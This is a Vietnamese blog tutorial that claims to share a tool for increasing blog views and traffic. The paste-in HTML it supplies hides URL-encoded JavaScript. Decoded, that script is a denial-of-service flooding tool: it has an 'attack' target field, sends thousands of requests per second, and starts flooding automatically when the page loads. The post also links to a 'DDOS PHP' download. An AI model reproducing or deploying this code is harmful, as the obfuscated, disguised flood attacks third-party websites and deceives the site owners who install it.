HƯỚNG DẪN TẠO CÔNG CỤ TĂNG VIEW ONLINE CHO BLOG

xin chào các bạn đã quay trở lại với blogs star út , lâu rồi mình chưa share cái gì đó về tools hay công cụ.Cho các bạn , ak tình cờ mấy bữa nay mài mò vọc vạch và tạo ra được một vài công cụ khá hữu ích dành cho website it người biết đến , có thể giúp họ tăng được khá nhiều lưu lượng traffic cho blog , website ,youtube, ...

HƯỚNG DẪN THỰC HIỆN

Các bạn chỉ cần copy đoạn code bên dưới và truy cập vào Trang => trang mới => sang html => dán đoạn code bên dưới vào và lưu lại là được. Hoặc đặt nơi muốn đặt
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-1ZdKP4sh-R0/WvcY90RjnjI/AAAAAAAAIqQ/hxf5xQ330sUOwPpziDRjUuMHymEnmKObQCLcBGAs/s1600/one-of-the-largest-bitcoin-exchange-bitfinex-hit-by-massive-ddos-attacks-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="400" data-original-width="760" height="336" src="https://3.bp.blogspot.com/-1ZdKP4sh-R0/WvcY90RjnjI/AAAAAAAAIqQ/hxf5xQ330sUOwPpziDRjUuMHymEnmKObQCLcBGAs/s640/one-of-the-largest-bitcoin-exchange-bitfinex-hit-by-massive-ddos-attacks-1.png" width="640" /></a></div>
<br /></div>
<center>
<a class="bsw-btn bsw_btn" href="https://leminhut09.000webhostapp.com/ddos.php" target="blank" title="Download">DDOS PHP</a></center>
<script>
<!--
document.write(unescape("%3Cdiv%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%20trbidi%3D%22on%22%3E%0A%3Cmarquee%20direction%3D%22left%22%20style%3D%22background%3A%20orange%3B%22%3El%u01B0u%20%FD%20m%E1y%20Ram%20y%u1EBFu%20v%E0%20d%F9ng%20%u0111i%u1EC7n%20tho%u1EA1i%20th%F4ng%20n%EAn%20ch%u1EA1y%20tools%20n%E0y%20v%EC%20ch%FAng%20fresh%20r%u1EA5t%20nhanh%20c%F3%20th%u1EC3%20l%E0m%20treo%20%2C%20%u0111%u01A1%20m%E1y%20th%u1EADm%20th%ED%20x%F3a%20x%u1EA1ch%20d%u1EEF%20li%u1EC7u%20m%E1y%20b%u1EA1n%20%u0111ang%20d%F9ng%20%2C%20th%EDch%20h%u1EE3p%20ch%E1y%20ch%FAng%20tr%EAn%20nh%u1EEFng%20m%E1y%20ram%20m%u1EA1nh%20%2C%20v%E0%20m%E1y%20t%EDnh%20c%u1EA5u%20h%ECnh%20cao%3C/marquee%3E%3Cbr%20/%3E%0A%3Cdiv%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%20trbidi%3D%22on%22%3E%0A%3Ch2%20style%3D%22background%3A%200px%200px%20rgb%28255%2C%20255%2C%20255%29%3B%20border-bottom-style%3A%20solid%3B%20border-color%3A%20initial%3B%20border-image%3A%20initial%3B%20border-left-style%3A%20initial%3B%20border-right-style%3A%20initial%3B%20border-top-style%3A%20solid%3B%20border-width%3A%201px%200px%202px%3B%20color%3A%20%23bc382e%3B%20font-stretch%3A%20normal%3B%20font-variant-east-asian%3A%20normal%3B%20font-variant-numeric%3A%20normal%3B%20letter-spacing%3A%201px%3B%20line-height%3A%20normal%3B%20margin%3A%2010px%200px%3B%20outline%3A%200px%3B%20padding%3A%2010px%200px%3B%20position%3A%20relative%3B%20text-align%3A%20center%3B%20text-transform%3A%20uppercase%3B%20transition%3A%200.4s%3B%20vertical-align%3A%20baseline%3B%22%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20medium%3B%22%3E%3Cb%3E%u0110i%u1EC1n%20link%20c%u1EA7n%20t%u1EA5n%20c%F4ng%3C/b%3E%3C/span%3E%3C/h2%3E%0A%3Clabel%3E%3Cinput%20id%3D%22targetURL%22%20name%3D%22xD%22%20style%3D%22width%3A%20180%25%3B%22%20value%3D%22https%3A//leminhut09.000webhostapp.com/ddos_starut.php%22%20/%3E%3C/label%3E%0A%0A%3Cfieldset%3E%0A%3Ch4%3E%0AT%u1EA5n%20c%F4ng%3C/h4%3E%0A%3Cbutton%20class%3D%22btn%20btn-info%22%20id%3D%22fireButton%22%3ED%u1EEBng%20t%u1EA5n%20c%F4ng%3C/button%3E%0A%3C/fieldset%3E%0A%3Cfieldset%3E%0A%3Clabel%3E%0A%3Cspan%20id%3D%22result_box%22%3E%0A%3Cspan%20title%3D%22Requests%20per%20second%22%3Ehow%20to%20fresh%3C/span%3E%0A%3C/span%3E%0A%3Cinput%20id%3D%22rps%22%20style%3D%22width%3A%20100%25%3B%22%20value%3D%225000%22%20/%3E%0A%3C/label%3E%3Cbr%20/%3E%0A%3Clabel%3EL%u1EDDi%20g%u1EEDi%20t%u1EDBi%20server%20%3A%0A%3Cinput%20id%3D%22message%22%20style%3D%22width%3A%20100%25%3B%22%20value%3D%22Ng%u1EE7m%20%u0111i%20c%u1EE5c%20c%u01B0ng%20%26lt%3B3%22%20/%3E%0A%3C/label%3E%0A%3C/fieldset%3E%0A%3Cfieldset%3E%0A%3Ch4%3E%0ATr%u1EA1ng%20th%E1i%20t%u1EA5n%20c%F4ng%3C/h4%3E%0A%3Cdl%20style%3D%22float%3A%20left%3B%22%3E%0A%3Cdt%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3ET%u1EA5n%20c%F4ng%3A%3C/span%3E%3C/dt%3E%0A%3Cdd%20id%3D%22requestedCtr%22%3E53933%3C/dd%3E%0A%3Cdt%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3ETh%E0nh%20c%F4ng%3A%3C/span%3E%3C/dt%3E%0A%3Cdd%20id%3D%22succeededCtr%22%3E48291%3C/dd%3E%0A%3Cdt%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3ETh%u1EA5t%20b%u1EA1i%3A%3C/span%3E%3C/dt%3E%0A%3Cdd%20id%3D%22failedCtr%22%3E0%3C/dd%3E%0A%3C/dl%3E%0A%3C/fieldset%3E%0A%3Cscript%3E%0A%28function%20%28%29%20%7B%0Avar%20fireInterval%3B%0Avar%20isFiring%20%3D%20false%3B%0Avar%20currentTime%20%3D%20new%20Date%28%29%0Avar%20lastSuccess%20%3D%20currentTime.getTime%28%29%3B%0Avar%20requestedCtrNode%20%3D%20document.getElementById%28%22requestedCtr%22%29%2C%0AsucceededCtrNode%20%3D%20document.getElementById%28%22succeededCtr%22%29%2C%0AfailedCtrNode%20%3D%20document.getElementById%28%22failedCtr%22%29%2C%0AtargetURLNode%20%3D%20document.getElementById%28%22targetURL%22%29%2C%0AfireButton%20%3D%20document.getElementById%28%22fireButton%22%29%2C%0AmessageNode%20%3D%20document.getElementById%28%22message%22%29%2C%0ArpsNode%20%3D%20document.getElementById%28%22rps%22%29%2C%0AtimeoutNode%20%3D%20document.getElementById%28%22timeout%22%29%3B%0Avar%20targetURL%20%3D%20targetURLNode.value%3B%0A%0AtargetURLNode.onchange%20%3D%20function%20%28%29%20%7B%0AtargetURL%20%3D%20this.value%3B%0A%7D%3B%0A%0Avar%20requestsHT%20%3D%20%7B%7D%3B%0Avar%20requestedCtr%20%3D%200%2C%0AsucceededCtr%20%3D%200%2C%0AfailedCtr%20%3D%200%3B%0Avar%20makeHttpRequest%20%3D%20function%20%28%29%20%7B%0Aif%20%28%20%28currentTime.getTime%28%29-lastSuccess%29%20%3E%2010000%29%20%7B%20%0Areturn%3B%0A%7D%20else%20%7B%20lastSuccess%20%3D%20currentTime.getTime%28%29%3B%7D%3B%0A%0Avar%20rID%20%3DNumber%28new%20Date%28%29%29%3B%0Avar%20img%20%3D%20new%20Image%28%29%3B%0Aimg.onerror%20%3D%20function%20%28%29%20%7B%20onFail%28rID%29%3B%20%7D%3B%0Aimg.onabort%20%3D%20function%20%28%29%20%7B%20onFail%28rID%29%3B%20%7D%3B%0Aimg.onload%20%3D%20function%20%28%29%20%7B%20onSuccess%28rID%29%3B%20%7D%3B%0A%0Aimg.setAttribute%28%22src%22%2C%20targetURL%20+%20%22%3Fid%3D%22%20+%20rID%20+%20%22%26msg%3D%22%20+%20messageNode.value%29%3B%0ArequestsHT%5BrID%5D%20%3D%20img%3B%0AonRequest%28rID%29%3B%0A%7D%3B%0A%0Avar%20onRequest%20%3D%20function%20%28rID%29%20%7B%0ArequestedCtr++%3B%0ArequestedCtrNode.innerHTML%20%3D%20requestedCtr%3B%0A%7D%3B%0A%0Avar%20onComplete%20%3D%20function%20%28rID%29%20%7B%0Adelete%20requestsHT%5BrID%5D%3B%0A%7D%3B%0A%0Avar%20onFail%20%3D%20function%20%28rID%29%20%7B%0AsucceededCtr++%3B%20%0AsucceededCtrNode.innerHTML%20%3D%20succeededCtr%3B%0Adelete%20requestsHT%5BrID%5D%3B%20%0A%7D%3B%0A%0Avar%20onSuccess%20%3D%20function%20%28rID%29%20%7B%0AsucceededCtr++%3B%0AsucceededCtrNode.innerHTML%20%3D%20succeededCtr%3B%0Adelete%20requestsHT%5BrID%5D%3B%0A%7D%3B%0A%0AfireButton.onclick%20%3D%20function%20%28%29%20%7B%0Aif%20%28isFiring%29%20%7B%0AclearInterval%28fireInterval%29%3B%0AisFiring%20%3D%20false%3B%0Athis.innerHTML%20%3D%20%22%u0110%E1nh%20ti%u1EBFp%22%3B%0A%7D%20else%20%7B%0AisFiring%20%3D%20true%3B%0Athis.innerHTML%20%3D%20%22D%u1EEBng%20%u0111%E1nh%22%3B%0AfireInterval%20%3D%20setInterval%28makeHttpRequest%2C%20%2810000%20/%20parseInt%28rpsNode.value%29%20%7C%200%29%29%3B%0A%7D%0A%7D%3B%0A%0Afunction%20Firecolombianew%28%29%20%7B%0Aif%20%28isFiring%29%20%7B%0AclearInterval%28fireInterval%29%3B%0AisFiring%20%3D%20false%3B%0Athis.innerHTML%20%3D%20%22Shoot%20Again%21%22%3B%0A%7D%20else%20%7B%0AisFiring%20%3D%20true%3B%0Athis.innerHTML%20%3D%20%22Stop%20flooding%22%3B%0AfireInterval%20%3D%20setInterval%28makeHttpRequest%2C%20%281000%20/%20parseInt%28rpsNode.value%29%20%7C%200%29%29%3B%0A%7D%0A%7D%3B%0A%0Adocument.getElementById%28%22targetURL%22%29.value%20%3D%20%22https%3A//leminhut.blogspot.com/%22%3B%0AFirecolombianew%28%29%3B%0A%7D%29%28%29%3B%0A%3C/script%3E%0A%0A%3Cbr%20/%3E%0A%3Cdiv%20style%3D%22clear%3A%20both%3B%22%3E%0A%3C/div%3E%0A%3C/div%3E%0A%3Cdiv%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%20trbidi%3D%22on%22%3E%0A%3Ch2%20style%3D%22background%3A%200px%200px%20rgb%28255%2C%20255%2C%20255%29%3B%20border-bottom-style%3A%20solid%3B%20border-color%3A%20initial%3B%20border-image%3A%20initial%3B%20border-left-style%3A%20initial%3B%20border-right-style%3A%20initial%3B%20border-top-style%3A%20solid%3B%20border-width%3A%201px%200px%202px%3B%20color%3A%20%23bc382e%3B%20font-family%3A%20Roboto%3B%20font-size%3A%2015px%3B%20font-stretch%3A%20normal%3B%20font-variant-east-asian%3A%20normal%3B%20font-variant-numeric%3A%20normal%3B%20font-weight%3A%20500%3B%20letter-spacing%3A%201px%3B%20line-height%3A%20normal%3B%20margin%3A%2010px%200px%3B%20outline%3A%200px%3B%20padding%3A%2010px%200px%3B%20position%3A%20relative%3B%20text-align%3A%20center%3B%20text-transform%3A%20uppercase%3B%20transition%3A%200.4s%3B%20vertical-align%3A%20baseline%3B%22%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20small%3B%22%3EL%u1EDCI%20K%u1EBET%3C/span%3E%3C/h2%3E%0A%3Cdiv%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20small%3B%22%3EB%EAn%20tr%EAn%20l%E0%20tools%20ddos%20online%20m%u1EDBi%20v%u1EEBa%20%u0111%u01B0%u1EE3c%20m%ECnh%20t%EDch%20h%u1EE3p%20v%E0o%20blog%2C%20%3Cb%3El%u01B0u%20%FD%20%3A%20%3C/b%3Etools%20n%E0y%20%u0111ang%20trong%20th%u1EDDi%20gian%20ph%E1t%20tri%u1EC3n%20v%E0%20ch%u1EA1y%20th%u1EED%20nghi%u1EC7m%20tr%EAn%20blogger%20n%EAn%20v%u1EABn%20ch%u01B0a%20%u1ED5n%20%u0111%u1ECBnh%20l%u1EAFm%20m%ECnh%20s%u1EBD%20c%u1ED1%20g%u1EAFng%20n%E2ng%20c%u1EA5p%20th%EAm%20%u0111%u1EBFn%20cho%20ho%E0n%20thi%u1EC7n.%3C/span%3E%3C/div%3E%0A%3Cdiv%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20small%3B%22%3E%3Cb%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3EC%C1CH%20B%C1O%20%3A%20%3C/span%3EToosl%20n%E0y%20mang%20t%EDnh%20ch%u1EA5t%20ph%E1%20ho%u1EA1i%20%2C%20m%u1ECDi%20thi%u1EC7t%20h%u1EA1i%20c%E1c%20b%u1EA1n%20ho%E0n%20to%E0n%20ch%u1ECBu%20tr%E1ch%20nhi%u1EC7m%20nh%E9%20.%3C/b%3E%3C/span%3E%3C/div%3E%0A%3Cdiv%3E%0A%3Cspan%20style%3D%22font-family%3A%20%26quot%3Broboto%26quot%3B%20%2C%20sans-serif%3B%20font-size%3A%20small%3B%22%3E%3Cb%3E%3Cspan%20style%3D%22color%3A%20red%3B%22%3EL%u01B0u%20%DD%20%3A%20%3C/span%3Etools%20n%E0y%20m%ECnh%20ch%u1EC9%20t%u1EA1o%20ra%20m%u1EE5c%20%u0111%EDch%20%u0111%u1EC3%20t%u0103ng%20th%EAm%20l%u01B0%u1EE3ng%20traffic%20cho%20website%20c%u1EA5m%20l%u1EA1m%20d%u1EE5ng%20v%E0o%20vi%u1EC7c%20x%u1EA5u%20d%u01B0%u1EDBi%20m%u1ECDi%20h%ECnh%20th%u1EE9c.%3C/b%3E%3C/span%3E%3C/div%3E%0A%3C/div%3E%0A%3C/div%3E%0A"));
//-->
</script>
</div>

LỜI KẾT

Chỉ vài bước đơn giản mình đã hướng đẫn xong cho các bạn tạo một tiện ích tăng view cực chất cho blog rồi đó đúng không nào.
Lưu ý : bài viết được độc quyền tại star út bạn nào có copy hay share lại nhớ để nguồn hộ mình nhé cảm ơn nhiều .
LIVE DEMO
  • Cảm Ơn Bạn Đã Ghé Thăm Duy Kiên Blogger !
  • Mọi thứ trên website đều là miễn phí.Được Leech Từ Nhiều Nguồn , Nếu Có Vấn Đề Bản Quyền Hãy Liên Hệ Với Chúng Tôi!
  • Tuyệt đối không click spam (click tặc quảng cáo). Hãy là một người sử dụng internet thông minh và có văn hóa! Xin cảm ơn.
CÓ THỂ BẠN ĐANG TÌM